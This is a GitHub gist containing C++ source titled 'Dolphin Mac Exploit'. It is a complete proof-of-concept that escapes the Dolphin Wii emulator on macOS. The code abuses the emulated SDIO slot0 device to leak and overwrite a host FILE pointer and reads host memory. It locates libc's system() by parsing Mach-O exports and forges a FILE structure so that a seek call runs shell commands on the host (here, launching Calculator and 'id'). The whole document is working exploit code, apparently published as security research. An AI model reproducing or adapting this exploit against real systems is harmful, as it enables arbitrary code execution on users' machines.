Skip to content

Instantly share code, notes, and snippets.

@hthh hthh/mac-exploit.cc
Last active Nov 14, 2016

Embed
What would you like to do?
Download ZIP
Dolphin Mac Exploit
Raw
mac-exploit.cc
#include <stdint.h>
extern "C" {
// entry point
void my_main(void);
}
// types
typedef uint8_t u8;
typedef uint16_t u16;
typedef uint32_t u32;
typedef uint64_t u64;
#define HW_IPC_PPCMSG 0xCD000000
#define HW_IPC_PPCCTRL 0xCD000004
#define HW_IPC_PPC_IRQFLAG 0xCD000030
#define INT_CAUSE_IPC_BROADWAY 0x40000000
#define IPC_CMD_OPEN 1
#define IPC_CMD_IOCTL 6
#define IPC_CMD_IOCTLV 7
#define IPC_REP_ASYNC 8
#define MODE_RW 3
#define IOCTL_WRITEHCR 0x01
#define IOCTL_READHCR 0x02
#define READ_MULTIPLE_BLOCK 0x12
#define IOCTLV_SENDCMD 0x07
// OS X FILE flags
#define OSX_SRD 0x0004 /* OK to read */
#define OSX_SOPT 0x0400 /* do fseek() optimisation */
#define OSX_SOFF 0x1000 /* set iff _offset is in fact correct */
// OS X Mach-O load commands
#define LC_SEGMENT_64 0x19
#define LC_DYLD_INFO_ONLY (0x22 | 0x80000000)
// we know out (virtual) memory is mapped at 0x2300000000 on OS X
#define OSX_MEMORY_BASE 0x2300000000ULL
// Utility functions
extern "C" {
void *memset(void *out, int c, u32 v) {
for (u32 i = 0; i < v; i++)
((char *)out)[i] = c;
return out;
}
}
int strequal(const char *a, const char *b) {
for (;;) {
if (*a != *b)
return 0;
if (*a == '\0')
return 1;
a++;
b++;
}
}
struct ipc_message { // see http://wiibrew.org/wiki/IOS
u32 cmd;
u32 ret;
u32 fd;
u32 arg[5];
u32 reserved[8];
} __attribute__((aligned(8)));
static u32 do_ipc_message_sync(volatile struct ipc_message *msg) {
*(volatile u32 *)HW_IPC_PPCMSG = (u32)msg;
*(volatile u32 *)HW_IPC_PPCCTRL = 0x7;
// wait for the async response (might not be the best approach)
while (msg->cmd != IPC_REP_ASYNC) {
// This is for the downcount - the JIT emits no code, but time
// advances 3 cycles per instruction.
for (int i = 0; i < 10; i++) {
asm volatile("sync ; sync ; sync ; sync ; sync ; sync ; sync ; sync ; "
"sync ; sync ; sync ; sync ; sync ; sync ; sync ; sync ; "
"sync ; sync ; sync ; sync ; sync ; sync ; sync ; sync ; "
"sync ; sync ; sync ; sync ; sync ; sync ; sync ; sync ; "
"sync ; sync ; sync ; sync ; sync ; sync ; sync ; sync ; "
"sync ; sync ; sync ; sync ; sync ; sync ; sync ; sync ; "
"sync ; sync ; sync ; sync ; sync ; sync ; sync ; sync ; "
"sync ; sync ; sync ; sync ; sync ; sync ; sync ; sync ; "
"sync ; sync ; sync ; sync ; sync ; sync ; sync ; sync ; "
"sync ; sync ; sync ; sync ; sync ; sync ; sync ; sync");
}
// Clear IPC interrupt flags
*(volatile u32 *)HW_IPC_PPCCTRL = 0x6;
}
return msg->ret;
}
static u32 open(const char *path, u32 mode) {
volatile struct ipc_message msg = {0};
msg.cmd = IPC_CMD_OPEN;
msg.arg[0] = (u32)path;
msg.arg[1] = mode;
return do_ipc_message_sync(&msg);
}
static u32 ioctl(u32 fd, u32 cmd, void *inbuf, u32 insize, void *outbuf,
u32 outsize) {
volatile struct ipc_message msg = {0};
msg.cmd = IPC_CMD_IOCTL;
msg.fd = fd;
msg.arg[0] = cmd;
msg.arg[1] = (u32)inbuf;
msg.arg[2] = insize;
msg.arg[3] = (u32)outbuf;
msg.arg[4] = outsize;
return do_ipc_message_sync(&msg);
}
struct ioctlv_buf {
void *ptr;
u32 size;
};
static u32 ioctlv(u32 fd, u32 param, u32 inputcount, u32 payloadcount,
struct ioctlv_buf *bufs) {
volatile struct ipc_message msg = {0};
msg.cmd = IPC_CMD_IOCTLV;
msg.fd = fd;
msg.arg[0] = param;
msg.arg[1] = inputcount;
msg.arg[2] = payloadcount;
msg.arg[3] = (u32)bufs;
return do_ipc_message_sync(&msg);
}
static u16 bswap(u16 x) { return __builtin_bswap16(x); }
static u32 bswap(u32 x) { return __builtin_bswap32(x); }
static u64 bswap(u64 x) { return __builtin_bswap64(x); }
template <typename value_type> struct host_value {
host_value() = default;
explicit host_value(value_type val) { *this = val; }
operator value_type() const { return bswap(raw); }
void operator=(value_type v) { raw = bswap(v); }
private:
value_type raw;
};
typedef uint8_t host_u8;
typedef host_value<uint16_t> host_u16;
typedef host_value<uint32_t> host_u32;
typedef host_value<uint64_t> host_u64;
typedef host_value<uint64_t> host_ptr;
// OS X specific code
struct osx_sbuf {
host_ptr _base;
host_u32 _size;
};
struct osx_FILE {
host_ptr _p;
host_u32 _r;
host_u32 _w;
host_u16 _flags;
host_u16 _file;
struct osx_sbuf _bf;
host_u32 _lbfsize;
host_ptr _cookie;
host_ptr _close;
host_ptr _read;
host_ptr _seek;
host_ptr _write;
struct osx_sbuf _ub;
host_ptr _extra;
host_u32 _ur;
host_u8 _ubuf[3];
host_u8 _nbuf[1];
struct osx_sbuf _lb;
host_u32 _blksize;
host_u64 _offset;
};
struct osx_pthread_mutex_t {
host_u8 opaque[0x40];
};
struct osx_mbstate_t {
union {
host_u8 _mbstate8[128];
host_u64 _mbstateL;
};
};
struct osx_FILEX {
host_ptr up;
struct osx_pthread_mutex_t fl_mutex;
host_u32 bits_orientation_counted;
osx_mbstate_t mbstate;
};
static u64 address_to_host(const void *p) {
return ((u32)p - 0x80000000) + OSX_MEMORY_BASE;
}
// IPC HLE interface wrappers
static void slot0_write(int fd, u32 reg, u32 val) {
u32 input[5] = {reg, 0, 0, 0, val};
ioctl(fd, IOCTL_WRITEHCR, &input, sizeof input, 0, 0);
}
static u32 slot0_read(int fd, u32 reg) {
u32 regnum = reg;
u32 value = 0;
ioctl(fd, IOCTL_READHCR, &regnum, sizeof regnum, &value, sizeof value);
return value;
}
static u64 slot0_read_fileptr(int fd) {
return slot0_read(fd, 129) + ((u64)slot0_read(fd, 130) << 32);
}
static void slot0_write_fileptr(int fd, u64 addr) {
slot0_write(fd, 129, (u32)addr);
slot0_write(fd, 130, (u32)(addr >> 32));
}
static u32 slot0_read_multiple_block(int fd, void *out, u32 offset,
u32 outsize) {
struct ioctlv_buf bufs[3] = {{0}};
bufs[1].ptr = out;
bufs[1].size = outsize;
u32 result = 0;
bufs[2].ptr = &result;
bufs[2].size = sizeof result;
struct {
u32 command;
u32 type;
u32 resp;
u32 arg;
u32 blocks;
u32 bsize;
void *addr;
u32 isDMA;
u32 pad0;
} req;
memset(&req, 0, sizeof req);
req.command = READ_MULTIPLE_BLOCK;
req.arg = offset;
req.addr = out;
req.bsize = 1;
req.blocks = outsize;
bufs[0].ptr = &req;
bufs[0].size = sizeof req;
return ioctlv(fd, IOCTLV_SENDCMD, 2, 1, bufs);
}
static void slot0_osx_read(int fd, void *out, u64 hostaddr, u32 size) {
osx_FILE file;
memset(&file, 0, sizeof file);
osx_FILEX extra;
memset(&extra, 0, sizeof extra);
file._extra = address_to_host(&extra);
file._flags = OSX_SOPT | OSX_SOFF | OSX_SRD;
file._seek = 1; // non-null
file._p = hostaddr;
file._bf._base = hostaddr;
file._offset = size + 1;
file._r = size + 1;
// replace the FILE* to point to our data
u64 saved_fileptr = slot0_read_fileptr(fd);
slot0_write_fileptr(fd, address_to_host(&file));
slot0_read_multiple_block(fd, out, 0, size);
// restore
slot0_write_fileptr(fd, saved_fileptr);
}
static u32 osx_read_u32(int fd, u64 addr) {
u32 r = 0;
slot0_osx_read(fd, &r, addr, sizeof r);
return bswap(r);
}
static u64 osx_read_ptr(int fd, u64 addr) {
u64 r = 0;
slot0_osx_read(fd, &r, addr, sizeof r);
return bswap(r);
}
// functions from dyld
static u32 read_uleb(u8 *&p, u8 *end) {
u32 result = 0;
int bit = 0;
do {
if (p == end)
return 0;
u8 slice = *p & 0x7f;
if (bit > 31) {
return 0;
} else {
result |= (slice << bit);
bit += 7;
}
} while (*p++ & 0x80);
return result;
}
static u8 *trie_walk(u8 *start, u8 *end, const char *s) {
u8 *p = start;
while (p != 0) {
u32 terminal_size = read_uleb(p, end);
if ((*s == '\0') && (terminal_size != 0)) {
return p;
}
u8 *children = p + terminal_size;
u8 children_remaining = *children++;
p = children;
u32 node_offset = 0;
for (; children_remaining > 0; --children_remaining) {
const char *ss = s;
u8 wrong_edge = false;
char c = *p;
while (c != '\0') {
if (!wrong_edge) {
if (c != *ss)
wrong_edge = true;
++ss;
}
++p;
c = *p;
}
if (wrong_edge) {
++p;
while ((*p & 0x80) != 0)
++p;
++p;
} else {
++p;
node_offset = read_uleb(p, end);
s = ss;
break;
}
}
if (node_offset != 0)
p = &start[node_offset];
else
p = 0;
}
return 0;
}
// mach-o parsing
static u64 find_system(int slot0, u64 libc_ptr) {
libc_ptr -= libc_ptr & 0xFFFF;
while (osx_read_u32(slot0, libc_ptr) != 0xFEEDFACF) {
libc_ptr -= 0x1000;
}
u64 libc_base = libc_ptr;
u32 ncmds = osx_read_u32(slot0, libc_base + 0x10);
u64 cmd_start = libc_base + 0x20;
u64 image_slide = 0;
u64 linkedit_slide = 0;
u32 exports_off = 0;
u32 exports_size = 0;
for (u32 cmdi = 0; cmdi < ncmds; cmdi++) {
u32 cmd = osx_read_u32(slot0, cmd_start);
u32 cmdsize = osx_read_u32(slot0, cmd_start + 4);
if (cmd == LC_SEGMENT_64) {
char sname[17] = {0};
slot0_osx_read(slot0, sname, cmd_start + 8, 16);
u64 vmaddr = osx_read_ptr(slot0, cmd_start + 0x18) + image_slide;
if (strequal(sname, "__TEXT")) {
image_slide = libc_base - vmaddr;
} else if (strequal(sname, "__LINKEDIT")) {
linkedit_slide = vmaddr - osx_read_ptr(slot0, cmd_start + 0x28);
}
} else if (cmd == LC_DYLD_INFO_ONLY) {
exports_off = osx_read_u32(slot0, cmd_start + 0x20 + 8);
exports_size = osx_read_u32(slot0, cmd_start + 0x24 + 8);
break;
}
cmd_start += cmdsize;
}
exports_size = exports_size < 0x10000 ? exports_size : 0x10000;
u8 exports[0x10000];
slot0_osx_read(slot0, exports, exports_off + linkedit_slide, exports_size);
u8 *p = trie_walk(exports, exports + exports_size, "_system");
if (!p)
return 0;
read_uleb(p, exports + exports_size);
return libc_ptr + read_uleb(p, exports + exports_size);
}
void my_main() {
// open the vulnerable device
int slot0 = open("/dev/sdio/slot0", MODE_RW);
u64 fileptr = slot0_read_fileptr(slot0);
osx_FILE leakedfile;
memset(&leakedfile, 0, sizeof leakedfile);
slot0_osx_read(slot0, &leakedfile, fileptr, sizeof leakedfile);
u64 system_ptr = find_system(slot0, leakedfile._read);
if (!system_ptr)
return;
// create a fake file structure which will run
// our commands on "fseek"
const char *cmdstring = "open -a Calculator ; "
"echo 'success! running shell commands as:' ; id";
// out-of-bounds write will replace a file pointer
// create some fake file objects
osx_FILE file;
memset(&file, 0, sizeof file);
osx_FILEX extra;
memset(&extra, 0, sizeof extra);
file._extra = address_to_host(&extra);
file._cookie = address_to_host(cmdstring);
file._seek = system_ptr;
u64 saved_fileptr = slot0_read_fileptr(slot0);
slot0_write_fileptr(slot0, address_to_host(&file));
u32 ignored;
slot0_read_multiple_block(slot0, &ignored, 0x1234, sizeof ignored);
// restore
slot0_write_fileptr(slot0, saved_fileptr);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.